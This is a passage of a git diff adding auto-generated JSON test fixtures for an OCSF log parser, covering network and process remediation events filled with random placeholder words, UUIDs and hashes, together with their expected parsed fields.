Media\", \"uid\": \"a3ae1122-a02f-11ef-b0ef-0242ac110007\", \"type_id\": 5}, \"connection_info\": {\"uid\": \"a3ae3c42-a02f-11ef-bdd6-0242ac110007\", \"boundary\": \"Internet Gateway\", \"protocol_name\": \"nuts oriented data\", \"direction\": \"Inbound\", \"boundary_id\": 11, \"direction_id\": 1, \"protocol_num\": 88, \"protocol_ver\": \"Unknown\", \"protocol_ver_id\": 0}, \"severity\": \"Medium\", \"category_uid\": 7, \"activity_id\": 3, \"type_uid\": 700403, \"type_name\": \"Network Remediation Activity: Restore\", \"observables\": [{\"name\": \"catherine lawsuit wash\", \"type\": \"File Name\", \"value\": \"underwear img tp\", \"type_id\": 7}, {\"name\": \"drawn vol buy\", \"type\": \"Email Address\", \"type_id\": 5, \"reputation\": {\"base_score\": 40.1815, \"provider\": \"miscellaneous applying places\", \"score\": \"tapes\", \"score_id\": 99}}], \"category_name\": \"Remediation\", \"class_uid\": 7004, \"class_name\": \"Network Remediation Activity\", 
\"timezone_offset\": 96, \"activity_name\": \"Restore\", \"command_uid\": \"a3aecf68-a02f-11ef-b5f1-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a3ae8698-a02f-11ef-a4fc-0242ac110007\", \"src_url\": \"weak\"}, \"d3f_technique\": {\"name\": \"gratuit refused endorsed\", \"uid\": \"a3ae95ac-a02f-11ef-b756-0242ac110007\"}}], \"enrichments\": [{\"data\": \"year\", \"name\": \"terry acceptance unavailable\", \"type\": \"me mo fetish\", \"value\": \"ride restore bearing\", \"created_time\": 1731331194181, \"provider\": \"illinois ferrari samuel\", \"reputation\": {\"base_score\": 43.1915, \"provider\": \"view rankings um\", \"score\": \"Very Safe\", \"score_id\": 1}, \"short_desc\": \"uganda pose worse\", \"src_url\": \"aluminium\"}, {\"data\": \"funky\", \"name\": \"italic electrical successfully\", \"type\": \"ethnic hitachi stevens\", \"value\": \"steven m rogers\", \"desc\": \"digital jeffrey rogers\", \"created_time\": 1731331194181, \"short_desc\": \"cook psi jobs\", \"src_url\": \"hp\"}], \"severity_id\": 3, \"status_code\": \"professionals\", \"status_detail\": \"affiliated carries publications\", \"status_id\": 0}" + }, + "expected": { + "message": "{\"count\": 70, \"message\": \"virtue carb keeps\", \"status\": \"Unknown\", \"time\": 1731331194181, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"subjective myself systems\", \"version\": \"1.3.0\", \"uid\": \"a3ac922a-a02f-11ef-984c-0242ac110007\", \"feature\": {\"name\": \"seafood zen attacks\", \"version\": \"1.3.0\", \"uid\": \"a3ad2ca8-a02f-11ef-a741-0242ac110007\"}, \"vendor_name\": \"sullivan participation wired\"}, \"extensions\": [{\"name\": \"faq valuable theory\", \"version\": \"1.3.0\", \"uid\": \"a3ad55ac-a02f-11ef-9d32-0242ac110007\"}, {\"name\": \"diesel salmon graduates\", \"version\": \"1.3.0\", \"uid\": \"a3ad70e6-a02f-11ef-be20-0242ac110007\"}], \"profiles\": [], \"log_name\": \"influence increasing towers\", \"log_provider\": 
\"defence ignore carroll\", \"original_time\": \"baths ends led\", \"tenant_uid\": \"a3ad8d56-a02f-11ef-a66b-0242ac110007\"}, \"scan\": {\"name\": \"fits educated vip\", \"type\": \"Attached Media\", \"uid\": \"a3ae1122-a02f-11ef-b0ef-0242ac110007\", \"type_id\": 5}, \"connection_info\": {\"uid\": \"a3ae3c42-a02f-11ef-bdd6-0242ac110007\", \"boundary\": \"Internet Gateway\", \"protocol_name\": \"nuts oriented data\", \"direction\": \"Inbound\", \"boundary_id\": 11, \"direction_id\": 1, \"protocol_num\": 88, \"protocol_ver\": \"Unknown\", \"protocol_ver_id\": 0}, \"severity\": \"Medium\", \"category_uid\": 7, \"activity_id\": 3, \"type_uid\": 700403, \"type_name\": \"Network Remediation Activity: Restore\", \"observables\": [{\"name\": \"catherine lawsuit wash\", \"type\": \"File Name\", \"value\": \"underwear img tp\", \"type_id\": 7}, {\"name\": \"drawn vol buy\", \"type\": \"Email Address\", \"type_id\": 5, \"reputation\": {\"base_score\": 40.1815, \"provider\": \"miscellaneous applying places\", \"score\": \"tapes\", \"score_id\": 99}}], \"category_name\": \"Remediation\", \"class_uid\": 7004, \"class_name\": \"Network Remediation Activity\", \"timezone_offset\": 96, \"activity_name\": \"Restore\", \"command_uid\": \"a3aecf68-a02f-11ef-b5f1-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a3ae8698-a02f-11ef-a4fc-0242ac110007\", \"src_url\": \"weak\"}, \"d3f_technique\": {\"name\": \"gratuit refused endorsed\", \"uid\": \"a3ae95ac-a02f-11ef-b756-0242ac110007\"}}], \"enrichments\": [{\"data\": \"year\", \"name\": \"terry acceptance unavailable\", \"type\": \"me mo fetish\", \"value\": \"ride restore bearing\", \"created_time\": 1731331194181, \"provider\": \"illinois ferrari samuel\", \"reputation\": {\"base_score\": 43.1915, \"provider\": \"view rankings um\", \"score\": \"Very Safe\", \"score_id\": 1}, \"short_desc\": \"uganda pose worse\", \"src_url\": \"aluminium\"}, {\"data\": \"funky\", \"name\": \"italic electrical 
successfully\", \"type\": \"ethnic hitachi stevens\", \"value\": \"steven m rogers\", \"desc\": \"digital jeffrey rogers\", \"created_time\": 1731331194181, \"short_desc\": \"cook psi jobs\", \"src_url\": \"hp\"}], \"severity_id\": 3, \"status_code\": \"professionals\", \"status_detail\": \"affiliated carries publications\", \"status_id\": 0}", + "event": { + "action": "restore", + "category": [], + "outcome": "unknown", + "provider": "defence ignore carroll", + "reason": "virtue carb keeps", + "severity": 3, + "type": [] + }, + "@timestamp": "2024-11-11T13:19:54.181000Z", + "network": { + "direction": [ + "inbound" + ], + "iana_number": "88" + }, + "ocsf": { + "activity_id": 3, + "activity_name": "Restore", + "class_name": "Network Remediation Activity", + "class_uid": 7004 + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_process_remediation_activity_1.json b/OCSF/ocsf/tests/generated_process_remediation_activity_1.json new file mode 100644 index 000000000..ac2f48c8a --- /dev/null +++ b/OCSF/ocsf/tests/generated_process_remediation_activity_1.json 
@@ -0,0 +1,78 @@ +{ + "input": { + "message": "{\"message\": \"heaven country sugar\", \"process\": {\"name\": \"Success\", \"pid\": 94, \"file\": {\"name\": \"earliest.pdb\", \"owner\": {\"name\": \"Tee\", \"type\": \"Unknown\", \"domain\": \"term assembled gossip\", \"uid\": \"223ad95e-a02f-11ef-8523-0242ac110007\", \"type_id\": 0, \"full_name\": \"Kaycee Valarie\", \"risk_level\": \"orleans medicines legal\"}, \"type\": \"Regular File\", \"path\": \"guilty different comply/expects.accdb/earliest.pdb\", \"desc\": \"prominent purse jones\", \"ext\": \"rendered ministry investigators\", \"type_id\": 1, \"parent_folder\": \"guilty different comply/expects.accdb\", \"hashes\": [{\"value\": \"EFE899C74558F20B08BBC19BF0228C0C25BDDB7871D80BD34AC8B33C030B3698\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"6B1C747BA410921F62727C6AEE307A71A7021A4F23DCD2CCFAB1EC037E3A86C28518C84FC4E389893A41ED6CC8EFCA276E1FA37D836A1183305EC8DD7BC3D3F0\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}]}, \"user\": {\"name\": \"Livestock\", \"type\": \"Admin\", \"uid\": \"223aed7c-a02f-11ef-943c-0242ac110007\", \"type_id\": 2, \"risk_level\": \"sense\", \"risk_level_id\": 99}, \"loaded_modules\": [\"/offered/her/msg/vegetarian/bizarre.html\", \"/principle/setting/liz/defendant/herself.wsf\"], \"cmd_line\": \"guided stretch phrases\", \"created_time\": 1731330976996, \"parent_process\": {\"name\": \"Em\", \"pid\": 60, \"file\": {\"name\": \"texas.rss\", \"type\": \"Regular File\", \"path\": \"pipeline memorabilia wednesday/lindsay.thm/texas.rss\", \"product\": {\"name\": \"rather rate cms\", \"version\": \"1.3.0\", \"uid\": \"223b1036-a02f-11ef-a666-0242ac110007\", \"lang\": \"en\", \"vendor_name\": \"assistance printers careful\"}, \"uid\": \"223b1766-a02f-11ef-b077-0242ac110007\", \"ext\": \"around clear funk\", \"type_id\": 1, \"parent_folder\": \"pipeline memorabilia wednesday/lindsay.thm\", \"accessed_time\": 1731330976998, \"hashes\": [{\"value\": 
\"0C9582BD64D9BAB6B4D907C275F45B5D3FC0035986E6294724E7FC4C77A9E16F42AD975BA9F5AD3884CCEFB2635640629F2AA538C5FDA52E2D872D3B73F65C6C\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"31FEBEB59C135F276A56FF06D2A3B00B982685E2D8EF3205B97EB80E0F4DCDC3\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"is_system\": true, \"xattributes\": {}}, \"user\": {\"name\": \"Membership\", \"type\": \"System\", \"uid\": \"223b30c0-a02f-11ef-87cb-0242ac110007\", \"type_id\": 3, \"full_name\": \"Anita Rosanna\", \"email_addr\": \"Li@scientific.travel\"}, \"uid\": \"223b4aa6-a02f-11ef-9d39-0242ac110007\", \"cmd_line\": \"suits chris sega\", \"created_time\": 1731330976999, \"lineage\": [\"alternative consistently improved\", \"cats charm hardcover\"], \"parent_process\": {\"name\": \"Humor\", \"pid\": 26, \"file\": {\"name\": \"incorrect.gadget\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"upset india relax/marie.3gp/incorrect.gadget\", \"product\": {\"name\": \"grades internationally ordinary\", \"version\": \"1.3.0\", \"uid\": \"223b9d6c-a02f-11ef-af12-0242ac110007\", \"feature\": {\"name\": \"motivation bridges other\", \"version\": \"1.3.0\", \"uid\": \"223bade8-a02f-11ef-a579-0242ac110007\"}, \"vendor_name\": \"lightweight monday station\"}, \"uid\": \"223bb4f0-a02f-11ef-9470-0242ac110007\", \"ext\": \"celebrities intelligent david\", \"type_id\": 1, \"accessor\": {\"name\": \"Institutes\", \"type\": \"User\", \"uid\": \"223bc1b6-a02f-11ef-be06-0242ac110007\", \"org\": {\"uid\": \"223bcfee-a02f-11ef-9eaf-0242ac110007\", \"ou_name\": \"sixth rats hawk\"}, \"type_id\": 1, \"account\": {\"name\": \"fairy clause literally\", \"uid\": \"223be3a8-a02f-11ef-b63a-0242ac110007\"}, \"credential_uid\": \"223befc4-a02f-11ef-9ee4-0242ac110007\", \"ldap_person\": {\"email_addrs\": [\"Suzann@verbal.biz\", \"Flo@submissions.int\"], \"last_login_time\": 1731330977003, \"leave_time\": 1731330977003}, \"risk_level\": \"Critical\", \"risk_level_id\": 4, 
\"risk_score\": 44}, \"parent_folder\": \"upset india relax/marie.3gp\", \"hashes\": [{\"value\": \"4B300F704B4BD8E100BDB3CAB1031A6CEDCB68FBC2C3606B1178586034AF4ECAC9A514E1A67728708F5FAD5AD1FC04AE78ECA412443352AF94457FEC9581ED11\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"C861DBBC3D16CC0E2D8C34764F0864239EBAC9973B25229B5ADFE56574C851ED73B6FCBC5931C8F0E23094B0D787E183BF5DF893560460CD403ED6F6C7174B7D\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}]}, \"user\": {\"name\": \"Protection\", \"type\": \"Unknown\", \"uid\": \"223c0d88-a02f-11ef-bfe0-0242ac110007\", \"type_id\": 0, \"full_name\": \"Brittanie Russel\", \"credential_uid\": \"223c156c-a02f-11ef-ae21-0242ac110007\", \"risk_level\": \"school wall wolf\", \"risk_score\": 37}, \"cmd_line\": \"roof dt critical\", \"created_time\": 1731330977004, \"parent_process\": {\"name\": \"Iv\", \"file\": {\"name\": \"retro.bmp\", \"type\": \"Named Pipe\", \"path\": \"rubber mj queen/archive.wav/retro.bmp\", \"signature\": {\"state\": \"lauderdale illustrated editorial\", \"certificate\": {\"version\": \"1.3.0\", \"subject\": \"mighty assisted detail\", \"issuer\": \"accompanied routers acne\", \"fingerprints\": [{\"value\": \"022DEC95C5096AFDD20A88DF019AC56B\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"8418E7362D4E0848D22B88FF2EC86F93AB49AE75A1558CE41B75732C6B78955A\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"created_time\": 1731330977005, \"expiration_time\": 1731330977005, \"serial_number\": \"receivers stylish woods\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, \"desc\": \"rep jeff tape\", \"ext\": \"through testimonials cardiff\", \"type_id\": 6, \"parent_folder\": \"rubber mj queen/archive.wav\", \"accessed_time\": 1731330977005, \"hashes\": [{\"value\": \"311EF3B8DC9FFBC403CA8BFEFAF69F728D2BE1AFFB42206E860CAA9F9FC9D8A57266E69AF264348CFACF811255655CDAF7BF4204EA0E7C0AD91297FCCB92BD28\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}, {\"value\": 
\"12B400C07544526379365632C5EAE7B868347EA513F21C09D8F5A9306B373005\", \"algorithm\": \"magic\", \"algorithm_id\": 99}]}, \"user\": {\"name\": \"Rise\", \"type\": \"omissions\", \"uid\": \"223c3c36-a02f-11ef-a7a3-0242ac110007\", \"type_id\": 99, \"account\": {\"name\": \"naturally textile pharmacies\", \"uid\": \"223c4b7c-a02f-11ef-90fb-0242ac110007\"}}, \"uid\": \"223c51e4-a02f-11ef-8de3-0242ac110007\", \"cmd_line\": \"keyboard milk printers\", \"created_time\": 1731330977006, \"parent_process\": {\"name\": \"Computation\", \"pid\": 30, \"file\": {\"name\": \"posted.yuv\", \"type\": \"Folder\", \"path\": \"kid hollow housing/trick.dwg/posted.yuv\", \"ext\": \"gage capabilities reasons\", \"type_id\": 2, \"accessor\": {\"type\": \"User\", \"uid\": \"223c6ed6-a02f-11ef-9e28-0242ac110007\", \"org\": {\"name\": \"salem civil rely\", \"uid\": \"223c784a-a02f-11ef-b6f3-0242ac110007\", \"ou_name\": \"saudi kathy going\"}, \"type_id\": 1, \"credential_uid\": \"223c7f2a-a02f-11ef-9b2e-0242ac110007\"}, \"parent_folder\": \"kid hollow housing/trick.dwg\", \"accessed_time\": 1731330977007, \"hashes\": [{\"value\": \"84282F14696FCE92F1387E783E6E35A7F462B8F63DD2CBBF03C8FBD817B4B334EA21DB328F7F7CC7040EBAEC27B5E741457DFC36FAEC09CB527ECE2B22C142C4\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"A74A78AF4E994F8C5ADE1098C677DEE43370A2B898524B0730EBFF42FA2C8359\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"is_system\": false}, \"user\": {\"name\": \"Royal\", \"type\": \"eclipse\", \"uid\": \"223c92ee-a02f-11ef-b37d-0242ac110007\", \"org\": {\"name\": \"races obtaining business\", \"uid\": \"223c9f6e-a02f-11ef-80ed-0242ac110007\", \"ou_name\": \"larger phones hotel\", \"ou_uid\": \"223ca72a-a02f-11ef-b597-0242ac110007\"}, \"type_id\": 99, \"account\": {\"name\": \"execution implemented contributions\", \"type\": \"AWS Account\", \"uid\": \"223cb300-a02f-11ef-a109-0242ac110007\", \"type_id\": 10}, \"ldap_person\": {\"location\": {\"desc\": \"Senegal, Republic 
of\", \"city\": \"Barely vpn\", \"country\": \"SN\", \"coordinates\": [-6.1769, -23.2664], \"continent\": \"Africa\"}, \"given_name\": \"oven registrar consultant\", \"ldap_cn\": \"insulin convicted posted\", \"modified_time\": 1731330977010}}, \"tid\": 28, \"uid\": \"223d09cc-a02f-11ef-88a8-0242ac110007\", \"cmd_line\": \"cologne preventing pvc\", \"created_time\": 1731330977010, \"integrity\": \"tears\", \"integrity_id\": 99, \"parent_process\": {\"pid\": 58, \"file\": {\"name\": \"concept.tar\", \"type\": \"Regular File\", \"path\": \"aging socks soc/traditions.nes/concept.tar\", \"modifier\": {\"name\": \"Mai\", \"type\": \"mineral\", \"uid\": \"223d2b96-a02f-11ef-a466-0242ac110007\", \"type_id\": 99, \"account\": {\"name\": \"fitting remembered advertiser\", \"type\": \"Linux Account\", \"uid\": \"223d378a-a02f-11ef-a93b-0242ac110007\", \"type_id\": 9}, \"credential_uid\": \"223d4086-a02f-11ef-aae8-0242ac110007\", \"risk_level\": \"Low\", \"risk_level_id\": 1, \"uid_alt\": \"chevrolet header sensitive\"}, \"uid\": \"223d47d4-a02f-11ef-80dd-0242ac110007\", \"ext\": \"finnish quotations trigger\", \"type_id\": 1, \"parent_folder\": \"aging socks soc/traditions.nes\", \"hashes\": [{\"value\": \"CCF8B7F3C1B91940CEA0982813BDECBB4177E02F8485991FF6F5F1ED5AEB7448BB931BD088B4617001768303ECEE51E3D61A3CC7369BA9EEF3C965E865EFEA4A\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}]}, \"user\": {\"name\": \"Clubs\", \"type\": \"Unknown\", \"uid\": \"223d59ae-a02f-11ef-8620-0242ac110007\", \"type_id\": 0, \"risk_score\": 1, \"uid_alt\": \"quebec robertson slovak\"}, \"tid\": 22, \"uid\": \"223d673c-a02f-11ef-9f3c-0242ac110007\", \"cmd_line\": \"barnes outlined alabama\", \"created_time\": 1731330977013, \"parent_process\": {\"name\": \"Weapons\", \"pid\": 16, \"file\": {\"name\": \"pale.odt\", \"owner\": {\"name\": \"Waiver\", \"type\": \"carroll\", \"type_id\": 99, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 13}, \"type\": \"Character Device\", 
\"path\": \"pupils demonstrated spam/constitution.obj/pale.odt\", \"ext\": \"intl hip entry\", \"type_id\": 3, \"company_name\": \"Lucas Emerald\", \"parent_folder\": \"pupils demonstrated spam/constitution.obj\", \"hashes\": [{\"value\": \"8DF60FF96BFECD59DE3F802675A05912\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"149D479F6A59E992D99E894B589A22B63E7F357049D6B573DA7AAD6DB5584F44\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}], \"security_descriptor\": \"decade prepared deleted\", \"xattributes\": {}}, \"user\": {\"name\": \"Gbp\", \"domain\": \"cathedral faces lovers\", \"uid\": \"223dc06a-a02f-11ef-8a14-0242ac110007\", \"full_name\": \"Bryan Yasmine\", \"risk_score\": 94}, \"uid\": \"223dc7f4-a02f-11ef-850b-0242ac110007\", \"cmd_line\": \"religious membership rb\", \"created_time\": 1731330977015, \"parent_process\": {\"name\": \"Invite\", \"pid\": 19, \"file\": {\"name\": \"aggressive.icns\", \"type\": \"Block Device\", \"path\": \"nyc runtime slip/ballot.thm/aggressive.icns\", \"desc\": \"ease ill executed\", \"ext\": \"malpractice road end\", \"type_id\": 4, \"mime_type\": \"income/poison\", \"parent_folder\": \"nyc runtime slip/ballot.thm\", \"hashes\": [{\"value\": \"037AEAEAF4BBF26DDABE7256A8294DC52DA48D575A1247B5C2598C47DE7AEBAB\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"C63B81E57E6869E3358411F7CCE3A2FA7BBE6FE5C1C54E3B4FDCD214F77082948C4A05C49CF7AF90CB5D0F112840C2A2B7715C80A07CF8511D608E1546DB6AC1\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731330977016}, \"user\": {\"type\": \"User\", \"uid\": \"223decca-a02f-11ef-ab3c-0242ac110007\", \"type_id\": 1, \"ldap_person\": {\"cost_center\": \"motion saudi unix\", \"deleted_time\": 1731330977016, \"employee_uid\": \"223df7ba-a02f-11ef-8947-0242ac110007\", \"hire_time\": 1731330977016, \"last_login_time\": 1731330977016, \"ldap_dn\": \"table silent possibly\", \"surname\": \"alone tongue emotional\"}, \"risk_level\": \"Low\", 
\"risk_level_id\": 1}, \"uid\": \"223dff76-a02f-11ef-b8d3-0242ac110007\", \"loaded_modules\": [\"/penguin/celebration/epson/lenders/with.uue\", \"/prefer/motherboard/traveling/factors/lawyer.tmp\"], \"cmd_line\": \"except routing crowd\", \"created_time\": 1731330977017, \"sandbox\": \"mechanisms suppose founded\"}}, \"sandbox\": \"tide oral independent\"}}}, \"terminated_time\": 1731330977017}}, \"xattributes\": {}}, \"status\": \"Unknown\", \"time\": 1731330976994, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"appeals discrete crash\", \"version\": \"1.3.0\", \"uid\": \"223a5696-a02f-11ef-ac80-0242ac110007\", \"vendor_name\": \"license push emperor\"}, \"sequence\": 26, \"profiles\": [], \"log_name\": \"ideal extended offers\", \"log_provider\": \"seller deserve sharing\", \"original_time\": \"alfred invitations speaking\", \"tenant_uid\": \"223a5fec-a02f-11ef-af39-0242ac110007\"}, \"severity\": \"Critical\", \"category_uid\": 7, \"activity_id\": 4, \"type_uid\": 700304, \"type_name\": \"Process Remediation Activity: Harden\", \"observables\": [{\"name\": \"uploaded bear will\", \"type\": \"Subnet\", \"type_id\": 12}, {\"name\": \"italic quantitative keno\", \"type\": \"Geo Location\", \"type_id\": 26}], \"category_name\": \"Remediation\", \"class_uid\": 7003, \"class_name\": \"Process Remediation Activity\", \"timezone_offset\": 64, \"activity_name\": \"Harden\", \"command_uid\": \"223ab6e0-a02f-11ef-9ffc-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"223a6fdc-a02f-11ef-a601-0242ac110007\"}, \"d3f_technique\": {\"name\": \"columbus sync taken\", \"uid\": \"223a80c6-a02f-11ef-9766-0242ac110007\"}}], \"enrichments\": [{\"data\": \"trackback\", \"name\": \"natural segment seattle\", \"value\": \"rebecca stack obtain\", \"created_time\": 1731330976994, \"provider\": \"shall surplus transparency\", \"reputation\": {\"base_score\": 63.125, \"provider\": \"czech meter kinda\", \"score\": \"Possibly 
Malicious\", \"score_id\": 8}, \"src_url\": \"employees\"}, {\"data\": \"academics\", \"name\": \"todd earliest quick\", \"type\": \"older complicated mails\", \"value\": \"issued dressed latina\", \"created_time\": 1731330976994, \"provider\": \"tube subtle austin\", \"short_desc\": \"summer concentration specific\", \"src_url\": \"domestic\"}], \"severity_id\": 5, \"status_code\": \"malawi\", \"status_detail\": \"odd lib station\", \"status_id\": 0}" + }, + "expected": { + "message": "{\"message\": \"heaven country sugar\", \"process\": {\"name\": \"Success\", \"pid\": 94, \"file\": {\"name\": \"earliest.pdb\", \"owner\": {\"name\": \"Tee\", \"type\": \"Unknown\", \"domain\": \"term assembled gossip\", \"uid\": \"223ad95e-a02f-11ef-8523-0242ac110007\", \"type_id\": 0, \"full_name\": \"Kaycee Valarie\", \"risk_level\": \"orleans medicines legal\"}, \"type\": \"Regular File\", \"path\": \"guilty different comply/expects.accdb/earliest.pdb\", \"desc\": \"prominent purse jones\", \"ext\": \"rendered ministry investigators\", \"type_id\": 1, \"parent_folder\": \"guilty different comply/expects.accdb\", \"hashes\": [{\"value\": \"EFE899C74558F20B08BBC19BF0228C0C25BDDB7871D80BD34AC8B33C030B3698\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"6B1C747BA410921F62727C6AEE307A71A7021A4F23DCD2CCFAB1EC037E3A86C28518C84FC4E389893A41ED6CC8EFCA276E1FA37D836A1183305EC8DD7BC3D3F0\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}]}, \"user\": {\"name\": \"Livestock\", \"type\": \"Admin\", \"uid\": \"223aed7c-a02f-11ef-943c-0242ac110007\", \"type_id\": 2, \"risk_level\": \"sense\", \"risk_level_id\": 99}, \"loaded_modules\": [\"/offered/her/msg/vegetarian/bizarre.html\", \"/principle/setting/liz/defendant/herself.wsf\"], \"cmd_line\": \"guided stretch phrases\", \"created_time\": 1731330976996, \"parent_process\": {\"name\": \"Em\", \"pid\": 60, \"file\": {\"name\": \"texas.rss\", \"type\": \"Regular File\", \"path\": \"pipeline memorabilia 
wednesday/lindsay.thm/texas.rss\", \"product\": {\"name\": \"rather rate cms\", \"version\": \"1.3.0\", \"uid\": \"223b1036-a02f-11ef-a666-0242ac110007\", \"lang\": \"en\", \"vendor_name\": \"assistance printers careful\"}, \"uid\": \"223b1766-a02f-11ef-b077-0242ac110007\", \"ext\": \"around clear funk\", \"type_id\": 1, \"parent_folder\": \"pipeline memorabilia wednesday/lindsay.thm\", \"accessed_time\": 1731330976998, \"hashes\": [{\"value\": \"0C9582BD64D9BAB6B4D907C275F45B5D3FC0035986E6294724E7FC4C77A9E16F42AD975BA9F5AD3884CCEFB2635640629F2AA538C5FDA52E2D872D3B73F65C6C\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"31FEBEB59C135F276A56FF06D2A3B00B982685E2D8EF3205B97EB80E0F4DCDC3\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"is_system\": true, \"xattributes\": {}}, \"user\": {\"name\": \"Membership\", \"type\": \"System\", \"uid\": \"223b30c0-a02f-11ef-87cb-0242ac110007\", \"type_id\": 3, \"full_name\": \"Anita Rosanna\", \"email_addr\": \"Li@scientific.travel\"}, \"uid\": \"223b4aa6-a02f-11ef-9d39-0242ac110007\", \"cmd_line\": \"suits chris sega\", \"created_time\": 1731330976999, \"lineage\": [\"alternative consistently improved\", \"cats charm hardcover\"], \"parent_process\": {\"name\": \"Humor\", \"pid\": 26, \"file\": {\"name\": \"incorrect.gadget\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"upset india relax/marie.3gp/incorrect.gadget\", \"product\": {\"name\": \"grades internationally ordinary\", \"version\": \"1.3.0\", \"uid\": \"223b9d6c-a02f-11ef-af12-0242ac110007\", \"feature\": {\"name\": \"motivation bridges other\", \"version\": \"1.3.0\", \"uid\": \"223bade8-a02f-11ef-a579-0242ac110007\"}, \"vendor_name\": \"lightweight monday station\"}, \"uid\": \"223bb4f0-a02f-11ef-9470-0242ac110007\", \"ext\": \"celebrities intelligent david\", \"type_id\": 1, \"accessor\": {\"name\": \"Institutes\", \"type\": \"User\", \"uid\": \"223bc1b6-a02f-11ef-be06-0242ac110007\", \"org\": {\"uid\": 
\"223bcfee-a02f-11ef-9eaf-0242ac110007\", \"ou_name\": \"sixth rats hawk\"}, \"type_id\": 1, \"account\": {\"name\": \"fairy clause literally\", \"uid\": \"223be3a8-a02f-11ef-b63a-0242ac110007\"}, \"credential_uid\": \"223befc4-a02f-11ef-9ee4-0242ac110007\", \"ldap_person\": {\"email_addrs\": [\"Suzann@verbal.biz\", \"Flo@submissions.int\"], \"last_login_time\": 1731330977003, \"leave_time\": 1731330977003}, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 44}, \"parent_folder\": \"upset india relax/marie.3gp\", \"hashes\": [{\"value\": \"4B300F704B4BD8E100BDB3CAB1031A6CEDCB68FBC2C3606B1178586034AF4ECAC9A514E1A67728708F5FAD5AD1FC04AE78ECA412443352AF94457FEC9581ED11\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"C861DBBC3D16CC0E2D8C34764F0864239EBAC9973B25229B5ADFE56574C851ED73B6FCBC5931C8F0E23094B0D787E183BF5DF893560460CD403ED6F6C7174B7D\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}]}, \"user\": {\"name\": \"Protection\", \"type\": \"Unknown\", \"uid\": \"223c0d88-a02f-11ef-bfe0-0242ac110007\", \"type_id\": 0, \"full_name\": \"Brittanie Russel\", \"credential_uid\": \"223c156c-a02f-11ef-ae21-0242ac110007\", \"risk_level\": \"school wall wolf\", \"risk_score\": 37}, \"cmd_line\": \"roof dt critical\", \"created_time\": 1731330977004, \"parent_process\": {\"name\": \"Iv\", \"file\": {\"name\": \"retro.bmp\", \"type\": \"Named Pipe\", \"path\": \"rubber mj queen/archive.wav/retro.bmp\", \"signature\": {\"state\": \"lauderdale illustrated editorial\", \"certificate\": {\"version\": \"1.3.0\", \"subject\": \"mighty assisted detail\", \"issuer\": \"accompanied routers acne\", \"fingerprints\": [{\"value\": \"022DEC95C5096AFDD20A88DF019AC56B\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"8418E7362D4E0848D22B88FF2EC86F93AB49AE75A1558CE41B75732C6B78955A\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"created_time\": 1731330977005, \"expiration_time\": 1731330977005, \"serial_number\": \"receivers 
stylish woods\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, \"desc\": \"rep jeff tape\", \"ext\": \"through testimonials cardiff\", \"type_id\": 6, \"parent_folder\": \"rubber mj queen/archive.wav\", \"accessed_time\": 1731330977005, \"hashes\": [{\"value\": \"311EF3B8DC9FFBC403CA8BFEFAF69F728D2BE1AFFB42206E860CAA9F9FC9D8A57266E69AF264348CFACF811255655CDAF7BF4204EA0E7C0AD91297FCCB92BD28\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}, {\"value\": \"12B400C07544526379365632C5EAE7B868347EA513F21C09D8F5A9306B373005\", \"algorithm\": \"magic\", \"algorithm_id\": 99}]}, \"user\": {\"name\": \"Rise\", \"type\": \"omissions\", \"uid\": \"223c3c36-a02f-11ef-a7a3-0242ac110007\", \"type_id\": 99, \"account\": {\"name\": \"naturally textile pharmacies\", \"uid\": \"223c4b7c-a02f-11ef-90fb-0242ac110007\"}}, \"uid\": \"223c51e4-a02f-11ef-8de3-0242ac110007\", \"cmd_line\": \"keyboard milk printers\", \"created_time\": 1731330977006, \"parent_process\": {\"name\": \"Computation\", \"pid\": 30, \"file\": {\"name\": \"posted.yuv\", \"type\": \"Folder\", \"path\": \"kid hollow housing/trick.dwg/posted.yuv\", \"ext\": \"gage capabilities reasons\", \"type_id\": 2, \"accessor\": {\"type\": \"User\", \"uid\": \"223c6ed6-a02f-11ef-9e28-0242ac110007\", \"org\": {\"name\": \"salem civil rely\", \"uid\": \"223c784a-a02f-11ef-b6f3-0242ac110007\", \"ou_name\": \"saudi kathy going\"}, 